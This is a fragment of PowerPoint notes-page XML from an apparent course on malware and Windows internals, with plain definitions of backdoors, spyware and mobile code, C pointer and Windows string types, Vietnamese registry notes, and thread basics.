                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, typically </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, designed to enable access to a computer or an area of its software that is not otherwise allowed.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171360" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Malicious mobile code </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>is becoming a popular way to get malware installed on a computer. Malicious mobile code is malware that is obtained from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>remote servers</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>transferred across a network</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, and then </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>downloaded on to your computer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>. This type of code can be transmitted through interactive Web applications such as ActiveX controls, Flash animation, or JavaScript.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171360" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> is a method, often secret, of bypassing normal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> or encryption in a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> system, a product, or an embedded device (e.g. a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>home router</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>), or its embodiment, e.g. as part of a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>cryptosystem</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>chipset</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, or a "homunculus computer" —a tiny computer-within-a-computer (such as that as found in Intel's </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>AMT technology</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>[2]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> Backdoors are often used for securing remote access to a computer, or obtaining access to </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171360" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> is software that aims to gather information about a person or organization, sometimes without their knowledge, that may send such information to another entity without the consumer's consent, that asserts control over a device without the consumer's knowledge, or it may send such information to another entity with the consumer's consent, through cookies .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>cryptographic systems</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764"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CA6BCA95-CB8A-4A2D-A474-26D7AA46451D}"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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862"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863"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808989FB-D487-40CE-8181-4E6A0FFA6A41}"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4" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="865" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPINT (*ptr) [50]: a pointer to an array of 50 long int values.</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int *(*ptr)[50]: a pointer to an array of pointers of 50 int values </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int (*ptr[2])[5]: a array of 2 pointers, each pointer to an array of 5 int values. </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866"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01011018-DB58-40C3-9AC9-770A081A62E1}"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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>LPCSTR 32-bit pointer to a constant null-terminated string of 8-bit Windows (ANSI)</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LPCWSTR 32-bit pointer to a constant string of 16-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>Unicode characters</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869"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7CB375A9-280A-4E20-A709-AC533D8A24CF}"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0" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="871" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Thanh ghi được chia 5 khóa gốc: root key (HKEY) trong đó chứa nhiều khóa con (subkey)</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Khóa (key): là một thư mục trong thanh ghi chứa các thư mục con hoặc các giá trị</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Mục (value entry): chứa cặp [tên, giá trị]</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Giá trị (dữ liệu): chứa trong mục</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872"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C3EFB229-19E9-450C-82FC-B59ED72880F5}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874"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875"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98C20DED-EC1A-4FEA-A594-893F0B450CE3}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877"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878"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541A0611-7C76-447F-B9D8-E572482076D3}"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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="880" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Threads are independent sequences of instructions that are executed by the CPU without waiting for other threads.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A process contains one or more threads, which execute part of the code within a process.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Threads within a process all share the same memory space, but each has its own processor registers and stack.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>When one thread is running, it has complete control of the CPU, or the CPU core, and other threads cannot affect the state of the CPU or core.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Before an OS switches between threads, all values in the CPU are saved in a structure called the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>thread context</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881"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9C95621D-F79E-4816-9885-19B38CBEF12F}"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2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="883"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884"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4C09E181-3A6A-4907-BC6F-1D8FCF12F39D}"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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886"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887"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9A406D1C-799A-4035-A072-FFF060C64523}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="889"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890"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CAA8481A-C16B-498E-8D32-A2FDA818C9F0}"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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4571640" cy="3428640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892"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893"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EADFC5B0-C05D-4EEF-927F-BFC78ECBAEEF}"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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
